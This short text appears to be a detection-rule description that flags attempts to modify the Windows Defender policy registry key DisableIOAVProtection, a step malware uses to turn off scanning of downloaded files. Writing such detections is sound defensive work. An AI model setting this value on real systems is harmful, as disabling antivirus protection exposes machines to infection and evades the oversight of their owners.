description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection